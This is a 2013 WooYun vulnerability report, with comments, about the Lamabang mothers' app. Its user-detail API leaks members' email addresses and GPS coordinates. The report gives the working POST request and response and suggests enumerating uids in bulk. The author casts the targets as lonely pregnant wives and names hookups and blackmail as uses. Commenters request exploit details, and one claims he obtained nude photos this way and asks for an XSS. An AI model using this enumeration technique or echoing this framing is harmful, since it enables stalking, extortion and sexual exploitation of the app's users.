当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045575

漏洞标题:辣妈帮手机客户端人妻信息泄漏(联系方式+gps),两性和情感板块各种寂寞的人妻,危害你懂的

相关厂商:辣妈帮

漏洞作者: 想要减肥的胖纸

提交时间:2013-12-11 09:33

修复时间:2014-01-25 09:34

公开时间:2014-01-25 09:34

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

辣妈帮是基于gps的社交软件,主要对象都是备孕或者怀孕的人妻。午夜的时候各种寂寞的少妇。。。。有人还私信神码直播。当你们直播的时候,你会知道背后有一双眼睛,已经知道了你的联系方式,物理位置,想想就可怕(你懂得)。。。。还有情感板块,神码感觉婚姻不幸福,喜欢上了别人。。。。。嗯。。如果被人恶意利用,敲诈。。后果不堪设想。。。。。。
最猥琐的方式是用该漏洞“约泡”。。。。。。。。。。。。。。

详细说明:

post提交uid查询用户的主页的时候,返回信息内包含了gps email等。

IMG_0025.PNG


IMG_0026.PNG


IMG_0027.PNG

漏洞证明:

注册一个账号 然后随便访问一个板块 点击一个人的头像 抓包。

POST http://open.lmbang.com/user/detail HTTP/1.1
Host: open.lmbang.com
Proxy-Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 53
Connection: close
Cookie: ***********dncac21
User-Agent: 辣妈帮HD 1.7.3 (iPad; iPhone OS 7.0.4; zh_CN)
uid=40***23&client_flag=lmb_ipad&timestamp=1386702488


uid是用户id,结合httpfuzz可以做到批量获取。。。。
返回信息

HTTP/1.1 200 OK
Server: nginx/1.2.8
Date: Tue, 10 Dec 2013 19:08:06 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
{"ret":"0","msg":"ok","timestamp":1386702486,"data":{"userinfo":{"uid":"403**23","nickname":"\u8fa3\u5988806032","email":"125***399@qq.com","nation":"","province":"","city":"","fansnum":"0","idolnum":"1","signature":"","face":"","face200":"","srcface":"","bangs":"58","bbtype":"0","bbbirthday":"0","bbgender":"-1","favorites":"0","scores":"18","isphoto":"1","photos":"0","lv":"1","lvicon":"\/image\/comm\/1.png","daren":"","authtype":"0","topics":"1","deltopics":"0","posts":2,"delposts":"0","comment_visible":"1","jingdu":"113.256513","weidu":"23.170005","is_silence_icon":"0","description":"","authname":"","background":"","jwd_valid":1,"beblacklist":"0"},"isfollow":0,"is_verify":0,"photo_list":[],"photo_count":"0","topic_list":[{"id":"4256131","pid":"0","title":"\u8fdb\u884c\u4e2d\u3002\u3002\u3002","dateline":"1386702013","favorites":"0","comments":"3","thumb":"","picture":"","choice":"0","bid":"8301","uid":"4032823","username":"125****399@qq.com","nickname":"\u8fa3\u5988806032","face":"","bbtype":"0","bbbirthday":"0","product_id":null,"product_price":null,"taobao_url":null,"bangname":"\u4e24\u6027\u5065\u5eb7\u8fa3\u5988\u5e2e","bpic":"http:\/\/img8.lamaqun.com\/img\/uploadfile\/day_120727\/201207271653394522.jpg"}],"topic_count":"1","comment_list":[{"dateline":"1386702444","content":"\u7ee7\u7eeding","tid":"4256131","bname":"\u4e24\u6027\u5065\u5eb7\u8fa3\u5988\u5e2e","bpic":"http:\/\/img8.lamaqun.com\/img\/uploadfile\/day_120727\/201207271653394522.jpg"},{"dateline":"1386702395","content":"\u6211\u4eec\u662f\u592b\u59bb\uff0c\u8981\u60f3\u770b\u7684\u79c1\u4fe1","tid":"4255995","bname":"\u4e24\u6027\u5065\u5eb7\u8fa3\u5988\u5e2e","bpic":"http:\/\/img8.lamaqun.com\/img\/uploadfile\/day_120727\/201207271653394522.jpg"},{"dateline":"1386702118","content":"kj\u4e2d\u3002\u3002\u3002","tid":"4256131","bname":"\u4e24\u6027\u5065\u5eb7\u8fa3\u5988\u5e2e","bpic":"http:\/\/img8.lamaqun.com\/img\/uploadfile\/day_120727\/201207271653394522.jpg"}],"comment_count":2}}


修复方案:

屏蔽相应回显

版权声明:转载请注明来源 想要减肥的胖纸@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2013-12-11 09:34 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    装一个

  2. 2013-12-11 09:40 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    请私信我利用细节

  3. 2013-12-11 09:56 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    洞主注意身体

  4. 2013-12-11 10:02 | 只是少年一位 ( 路人 | Rank:24 漏洞数:2 )

    @小川 他是想减肥,每天用着辣妈帮坐着运动,减肥方式不错啊

  5. 2013-12-11 13:27 | 嘿嘿嘿嘿1 ( 路人 | Rank:16 漏洞数:2 | ...)

    请私信我利用细节

  6. 2013-12-11 13:47 | 想要减肥的胖纸 ( 普通白帽子 | Rank:250 漏洞数:42 )

    @xsser 我发现还是少撸的好,现在有点蛋疼,可能最近一天2次到3次太频繁了。我发现米聊现在也不错。。。。。你懂的。。

  7. 2013-12-12 10:11 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    我去,可以考虑来一发

  8. 2013-12-12 21:45 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @想要减肥的胖纸 比的上陌陌?

  9. 2013-12-13 14:33 | 無情 ( 实习白帽子 | Rank:41 漏洞数:5 | 根据相关法律法规和政策,此信息未予显示。)

    @冷静 momo 上,,不是酒托就是上了MOMO还装纯的女人。 还有就是男的比女的多

  10. 2014-01-25 11:33 | 专治吹牛逼 ( 路人 | Rank:0 漏洞数:1 | 别拿你的木马,挑战我的密码!)

    請私信我利用細節

  11. 2014-01-26 16:16 | LaTCue ( 普通白帽子 | Rank:105 漏洞数:27 | 满脑子的艺术细菌,当然,是人体艺术。)

    哎呀 我是孕妇控 貌似看到好几个

  12. 2014-01-26 17:07 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    我觉得我不行!没想过也不想,因为我会受不了!

  13. 2014-01-27 09:20 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    @wefgod 相信自己,力量在心中

  14. 2014-01-27 10:32 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @小川 我去,看了你的截图我都想去围观下了。说不定一个私信过去就有人送上门了哈哈。

  15. 2014-01-27 11:03 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @wefgod 昨晚测试了下。成功搭讪到三个,做了她们出轨对象的候补之一!!

  16. 2014-01-27 11:03 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @wefgod 裸照什么的,已经发我了,还问我介意生孩子松弛吗

  17. 2014-01-27 11:06 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @冷静 @冷静 我去???????????????????!!!真的假的??你确定吗,同城的啊?给力了

  18. 2014-01-27 11:17 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @wefgod 千真万确,有相离几百米的,有相离几千 千米的

  19. 2014-01-27 11:26 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @冷静 (打包?)

  20. 2014-01-27 15:34 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @wefgod 打包个这网站的xss给我吧 我测试一个小时了 ...动态的地方 找准美女打啊

  21. 2014-01-27 23:26 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @冷静 我也木有…………今天去下了,感觉很震撼!回头围观看看哈哈哈

  22. 2014-02-01 13:31 | xsser_w ( 普通白帽子 | Rank:112 漏洞数:33 | 哎)

    大神 你用什么工具抓包的? 在pad上

  23. 2014-02-08 19:48 | 想要减肥的胖纸 ( 普通白帽子 | Rank:250 漏洞数:42 )

    一群寂寞的人。唉。以后不发这种邪恶的东西了。

  24. 2014-02-09 10:59 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @想要减肥的胖纸 造福人类的好事啊哈哈,应该发啊

  25. 2014-02-21 14:52 | x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )

    我要装一个 我操 这种东西